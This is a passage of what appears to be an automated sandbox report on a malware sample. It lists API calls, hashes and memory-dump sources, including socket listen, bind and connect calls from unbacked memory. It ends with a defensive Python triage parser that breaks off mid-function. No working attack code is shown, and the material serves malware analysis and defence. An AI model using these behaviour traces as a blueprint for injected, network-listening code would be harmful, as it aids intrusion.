                                                  • Opcode ID: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
                                                  • Instruction ID: 33b3fc867a4e2474f07ea88972ed825a8fcb80c5477311fdb059a6d734a7dbfa
                                                  • Opcode Fuzzy Hash: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
                                                  • Instruction Fuzzy Hash: 8411A031604208BBEB11DF29CC05F5F7BA8AF85348F054066F904AB2D2E775EE10CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _snwprintfmemcpy
                                                  • String ID: %2.2X
                                                  • API String ID: 2789212964-323797159
                                                  • Opcode ID: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
                                                  • Instruction ID: 0f19ce75f7d61601c6dcaf4457f6717ff276ffca2b35b3dd887d371e09c964f6
                                                  • Opcode Fuzzy Hash: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
                                                  • Instruction Fuzzy Hash: 87117C32908209BEEB10DFE8C9C69AE73A8BB45714F108436ED15E7141D678AA158BA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,00415610,?,00000000), ref: 0041542C
                                                  • CloseHandle.KERNEL32(?), ref: 00415438
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandleUnmapView
                                                  • String ID: !-A
                                                  • API String ID: 2381555830-3879722540
                                                  • Opcode ID: e8c78a8d6966c789a432285f25c1a97e3c9752e60e4576fb47e50e48bcd826d3
                                                  • Instruction ID: 6c5ed3bf8746cf55bcd37c1067f9027f6bc59eb5530dee428a664ff8177fa162
                                                  • Opcode Fuzzy Hash: e8c78a8d6966c789a432285f25c1a97e3c9752e60e4576fb47e50e48bcd826d3
                                                  • Instruction Fuzzy Hash: 5611BF35500B10DFCB319F25E945BD777E0FF84712B00492EE4929A662C738F8C48B48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _snwprintf.MSVCRT ref: 0040BD3E
                                                  • _snwprintf.MSVCRT ref: 0040BD5E
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _snwprintf$FileWritewcslen
                                                  • String ID: %%-%d.%ds
                                                  • API String ID: 889019245-2008345750
                                                  • Opcode ID: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
                                                  • Instruction ID: f6bde454874e3f12fe5a715dcb314e2825e8b387052435345983f70e28f49e73
                                                  • Opcode Fuzzy Hash: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
                                                  • Instruction Fuzzy Hash: 1D01D871500604BFD7109F69CC82D6AB7F9FF48318B10442EF946AB2A2DB75F841DB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _memicmpwcslen
                                                  • String ID: History
                                                  • API String ID: 1872909662-3892791767
                                                  • Opcode ID: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
                                                  • Instruction ID: 2715e0f5b76d9e8bf3bfa22bf35e41ec2dcc8bed56e6222f305abdff7d2b472d
                                                  • Opcode Fuzzy Hash: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
                                                  • Instruction Fuzzy Hash: 7BF0A4721046029BD210EA299D41A2BB7E8DF813A8F11093FF4D196282DF79DC5646A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileNameSavewcscpy
                                                  • String ID: X
                                                  • API String ID: 3080202770-3081909835
                                                  • Opcode ID: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
                                                  • Instruction ID: df6fc214ccc966a4ef74be52ccb1fa8de01b9f2d97edd1d3ec6f174b54628a36
                                                  • Opcode Fuzzy Hash: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
                                                  • Instruction Fuzzy Hash: C801E5B1E002499FDF00DFE9D8847AEBBF4AF08319F10402AE815E6280DB78A949CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040AC9A
                                                  • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040ACC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageSendmemset
                                                  • String ID: "
                                                  • API String ID: 568519121-123907689
                                                  • Opcode ID: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
                                                  • Instruction ID: c9b4fa4cd35477e261f68ac5278df415403352ef960fa58aa17ae8539a272808
                                                  • Opcode Fuzzy Hash: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
                                                  • Instruction Fuzzy Hash: 4E01D635800304EBEB20DF5AC841AEFB7F8FF84745F01802AE854A6281D3349955CF79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetWindowPlacement.USER32(?,?,?,?,?,0040D8F3,?,General,?,?,?,?,?,00000000,00000001), ref: 004017E0
                                                  • memset.MSVCRT ref: 004017F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlacementWindowmemset
                                                  • String ID: WinPos
                                                  • API String ID: 4036792311-2823255486
                                                  • Opcode ID: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
                                                  • Instruction ID: 403492ab1ae1e8e085d1b686bd15613ed323b870b3f74ac0ef6546771a88dbd4
                                                  • Opcode Fuzzy Hash: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
                                                  • Instruction Fuzzy Hash: BDF0FF71600204ABEB14EFA5D989F6E73E8AF04700F544479E9099B1D1D7B899008B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileNameOpenwcscpy
                                                  • String ID: X
                                                  • API String ID: 3246554996-3081909835
                                                  • Opcode ID: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
                                                  • Instruction ID: 22468463e432baa7279a8bf0e718ba1534ae3331c134da9758c07f59fbfd6832
                                                  • Opcode Fuzzy Hash: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
                                                  • Instruction Fuzzy Hash: 6601B2B1D0024CAFCB40DFE9D8856CEBBF8AF09708F10802AE819F6240EB7495458F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                  • wcsrchr.MSVCRT ref: 0040AB86
                                                  • wcscat.MSVCRT ref: 0040AB9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                  • String ID: _lng.ini
                                                  • API String ID: 383090722-1948609170
                                                  • Opcode ID: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
                                                  • Instruction ID: faf96e17328b6cfe7fea8df6c793311bae4d5162fb77f626620ffa022952bc65
                                                  • Opcode Fuzzy Hash: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
                                                  • Instruction Fuzzy Hash: E6C0125394672070F52233226E13B8F17696F22306F60002FF901280C3EFAC631180AF
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID:
                                                  • API String ID: 438689982-0
                                                  • Opcode ID: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
                                                  • Instruction ID: 8c22702d92a242b4074cdc0308f2d59ea0ad553ae454c6356856be76eef94a8a
                                                  • Opcode Fuzzy Hash: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
                                                  • Instruction Fuzzy Hash: 2551A775A0021AFBEF15DF95DC81AEEB775FF04340F54849AF805A6241E7389E50CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcslen.MSVCRT ref: 00407EF0
                                                    • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
                                                    • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
                                                    • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                  • memcpy.MSVCRT ref: 00407F5D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$memcpy$mallocwcslen
                                                  • String ID:
                                                  • API String ID: 726966127-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,00415592,?,?,00415592,004159A7,00000000,?,00415C14,?,00000000), ref: 00414C2E
                                                  • malloc.MSVCRT ref: 00414C36
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C4D
                                                  • free.MSVCRT(00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C54
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$freemalloc
                                                  • String ID:
                                                  • API String ID: 2605342592-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  APIs
                                                  • listen.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0BB4
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: listen
                                                  • String ID:
                                                  • API String ID: 3257165821-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • bind.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0FCF
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: bind
                                                  • String ID:
                                                  • API String ID: 1187836755-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • bind.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0FCF
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: bind
                                                  • String ID:
                                                  • API String ID: 1187836755-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • listen.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0BB4
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: listen
                                                  • String ID:
                                                  • API String ID: 3257165821-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 1AEB0645
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileMappingOpen
                                                  • String ID:
                                                  • API String ID: 1680863896-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetProcessTimes.KERNELBASE(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0D85
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: ProcessTimes
                                                  • String ID:
                                                  • API String ID: 1995159646-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: accept
                                                  • String ID:
                                                  • API String ID: 3005279540-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WSAEventSelect.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB137A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: EventSelect
                                                  • String ID:
                                                  • API String ID: 31538577-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateMutexW.KERNELBASE(?,?), ref: 1AEB0AC9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateMutex
                                                  • String ID:
                                                  • API String ID: 1964310414-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB03B0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • getsockname.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB10B3
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID:
                                                  • API String ID: 3358416759-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateMutexW.KERNELBASE(?,?), ref: 1AEB0AC9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateMutex
                                                  • String ID:
                                                  • API String ID: 1964310414-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • setsockopt.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0161
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: setsockopt
                                                  • String ID:
                                                  • API String ID: 3981526788-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 1AEB0645
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileMappingOpen
                                                  • String ID:
                                                  • API String ID: 1680863896-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileView
                                                  • String ID:
                                                  • API String ID: 3314676101-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 1AEB1726
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: Connect
                                                  • String ID:
                                                  • API String ID: 3144859779-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB03B0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 1AEB14F0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileView
                                                  • String ID:
                                                  • API String ID: 3314676101-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetProcessTimes.KERNELBASE(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0D85
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: ProcessTimes
                                                  • String ID:
                                                  • API String ID: 1995159646-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • OpenFileMappingW.KERNELBASE(?,?,?), ref: 1AEB143A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileMappingOpen
                                                  • String ID:
                                                  • API String ID: 1680863896-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • getsockname.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB10B3
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID:
                                                  • API String ID: 3358416759-0
                                                  • Opcode ID: c271397bc32378cbfcc47e2a77ae8d2626717895beb02e22476d6eb51ec7fe09
                                                  • Instruction ID: b6e8aaf306b929c5a57662403851af6b500667422f262fda8869d0972f8302c0
                                                  • Opcode Fuzzy Hash: c271397bc32378cbfcc47e2a77ae8d2626717895beb02e22476d6eb51ec7fe09
                                                  • Instruction Fuzzy Hash: 3D119D71540344AEE720CF59DC84F97FBA8EF45320F1484ABEE499B241D674E508CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • setsockopt.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0161
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: setsockopt
                                                  • String ID:
                                                  • API String ID: 3981526788-0
                                                  • Opcode ID: b8ef7aad4f727430a04b2b632f87a31a39d4a7f779c2f91511bf1c6a1523788b
                                                  • Instruction ID: 440ea38de7b9311efb8fbc976f9c40da2692e07e7c661638ad0a15becf713326
                                                  • Opcode Fuzzy Hash: b8ef7aad4f727430a04b2b632f87a31a39d4a7f779c2f91511bf1c6a1523788b
                                                  • Instruction Fuzzy Hash: D9119A72400204AFEB218F55DC84F9AFFA8EF45320F1488ABEA499B251C674A409CBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ioctlsocket.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB118F
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: ioctlsocket
                                                  • String ID:
                                                  • API String ID: 3577187118-0
                                                  • Opcode ID: ee084592677604f8dd964c186a32b08afb6daba73967bb8d2e15974c0b86b33d
                                                  • Instruction ID: 20958535f88fe82848a15b394a9bedd35e5894bbb462ae392cb608e703584734
                                                  • Opcode Fuzzy Hash: ee084592677604f8dd964c186a32b08afb6daba73967bb8d2e15974c0b86b33d
                                                  • Instruction Fuzzy Hash: B1119E71400244AEE721CF55DC84B56FFA8EF45320F14C8ABEE499B251D674E509CBB5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 1AEB1726
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: Connect
                                                  • String ID:
                                                  • API String ID: 3144859779-0
                                                  • Opcode ID: 9d07df911e3902abe521381a6b67f58e74570b943801d7e8ef6064578c958ab7
                                                  • Instruction ID: 797ab044d99b53d8ccfc2ef88928c99964d63b39025f71984963966e214ab428
                                                  • Opcode Fuzzy Hash: 9d07df911e3902abe521381a6b67f58e74570b943801d7e8ef6064578c958ab7
                                                  • Instruction Fuzzy Hash: 19115A35400744AFDB20CF55D848B56FFE4EF05220F1889AADE498B622D371E418DB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • OpenFileMappingW.KERNELBASE(?,?,?), ref: 1AEB143A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileMappingOpen
                                                  • String ID:
                                                  • API String ID: 1680863896-0
                                                  • Opcode ID: b7f2785ec83828e67689802db51e3cfcc00e3fb5d5a17bdd28c1b35bdedde01b
                                                  • Instruction ID: 8d6a017bb78e101079e28d609a1665232fd3b6863fbb3fc4ef729f4a11b145dd
                                                  • Opcode Fuzzy Hash: b7f2785ec83828e67689802db51e3cfcc00e3fb5d5a17bdd28c1b35bdedde01b
                                                  • Instruction Fuzzy Hash: 3F019E71900340AFE710CF55D888B96FFA4EF44220F08C8ABDE498B202D275E408CB72
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 1AEB14F0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileView
                                                  • String ID:
                                                  • API String ID: 3314676101-0
                                                  • Opcode ID: a0d3eb275cd4aa93eb51415fdcb7db922f4b41fdc3a0078259f78219078cdc2e
                                                  • Instruction ID: fe80a0cfb624cea735b6581325fde988c91ec1fb9a27b190deda09cbf4f03985
                                                  • Opcode Fuzzy Hash: a0d3eb275cd4aa93eb51415fdcb7db922f4b41fdc3a0078259f78219078cdc2e
                                                  • Instruction Fuzzy Hash: 92018C36400744EFDB20DF95D848B56FFA0EF04321F18C8AADE4A4B212D275E418DB72
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
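The entries above all come from the same memory dump (offset 1AEB0000, "based on PE: false") and mix Winsock calls (WSAConnect, getsockname, setsockopt, ioctlsocket) with file-mapping calls (OpenFileMappingW, MapViewOfFile). Reading that by eye across hundreds of entries is tedious, so the following added example (not part of the Joe Sandbox report or its tooling) parses entries in the report's own bullet layout and groups the called APIs per dump region. The sample input is constructed by copying four of the entries above; the grouping of API names into "network" and "file mapping" buckets is the author's own triage heuristic, and nothing is inferred from the dump filename beyond the "based on PE" field the report prints explicitly.

```python
"""Group Joe Sandbox-style function entries by memory dump region.

Added example, not code from the original report. It parses the
'APIs' / 'Memory Dump Source' blocks shown above and summarises, per
dump offset, which APIs are called and whether the region is backed
by a PE image, so an analyst can spot network-capable code living in
unbacked memory (the usual footprint of an injected or unpacked stage).
"""
import re

# Constructed input: four entries copied in the report's bullet layout.
SAMPLE = """\
APIs
• getsockname.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB10B3
Memory Dump Source
• Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
Similarity
• API ID: getsockname
APIs
• WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 1AEB1726
Memory Dump Source
• Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
APIs
• OpenFileMappingW.KERNELBASE(?,?,?), ref: 1AEB143A
Memory Dump Source
• Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
APIs
• MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 1AEB14F0
Memory Dump Source
• Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
"""

# One "• Api.MODULE(args), ref: ADDR" line as printed by the report.
API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# One "• Source File: ..., Offset: ADDR, based on PE: true|false" line.
SRC_RE = re.compile(
    r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)\s*$"
)

# Assumption: these buckets are the author's triage heuristic, not a
# classification the report itself provides.
NETWORK_APIS = {"WSAConnect", "connect", "getsockname", "setsockopt",
                "ioctlsocket", "socket", "send", "recv", "WSASend", "WSARecv"}
MAPPING_APIS = {"OpenFileMappingW", "OpenFileMappingA", "CreateFileMappingW",
                "CreateFileMappingA", "MapViewOfFile", "UnmapViewOfFile"}


def parse_entries(text):
    """Return a list of {'apis': [...], 'source': {...}|None}, one per 'APIs' block."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()               # the report is heavily indented
        if line == "APIs":
            cur = {"apis": [], "source": None}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append({"api": m["api"], "module": m["module"],
                                "ref": m["ref"].upper()})
            continue
        m = SRC_RE.match(line)
        if m:
            cur["source"] = {"file": m["file"], "offset": m["offset"].upper(),
                             "pe_backed": m["pe"] == "true"}
    return entries


def summarize(entries):
    """Collapse entries into one record per dump offset with triage flags."""
    regions = {}
    for e in entries:
        src = e["source"]
        if src is None:                  # entry without a dump source: skip
            continue
        r = regions.setdefault(src["offset"], {"pe_backed": src["pe_backed"],
                                               "apis": set(), "modules": set(),
                                               "call_sites": set()})
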